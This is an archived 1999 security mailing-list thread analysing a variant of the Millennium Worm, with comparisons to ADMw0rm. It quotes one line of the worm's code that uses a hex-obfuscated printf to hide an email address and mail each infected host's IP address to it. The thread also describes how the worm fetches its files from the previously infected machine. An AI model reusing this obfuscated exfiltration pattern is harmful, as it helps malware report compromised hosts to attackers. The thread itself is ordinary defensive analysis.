Hello, I posted two short write-ups on recent Internet worms I've seen in the wild (ADMw0rm and Millennium Worm). http://whitehats.com/worms/. From these previous posts it looks like someone has launched a variation of the Millennium Worm. Max Vision At 05:23 PM 9/7/1999 +0200, Adam Morrison wrote: > > On Wed, 1 Sep 1999, Christian Koderer wrote: > > > ./IP | mail `printf > > > "\x62\x65\x75\x72\x70\x40\x68\x6f\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d"` > > > logout > > > _EOF_ > > > > > > In case no one bothered figuring this one out, this translates to > > 'beurpat_private' > > > > Apparently './IP' is a program it runs to figure out which IP it should > > get the worm files from. Did you find a similarly named file? > >It's a worm; it gets the worm files from the last infected machine. >`IP' returns the address of the machine that the copy of the worm >is running on, and is used in the `cmd' grappling hook which >apparently gets executed on compromised remote hosts. Each time the >worm infects a machine, it mails the IP address of that machine to ><beurpat_private>. > >Now, not to make any unfounded allegations, but this worm looks >remarkably like ADMw0rm. I wonder why it restarts named when first >infecting a host, when it appears to also utilize several other >vulnerabilites in order to get in. Ho, hum.
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:04:34 PDT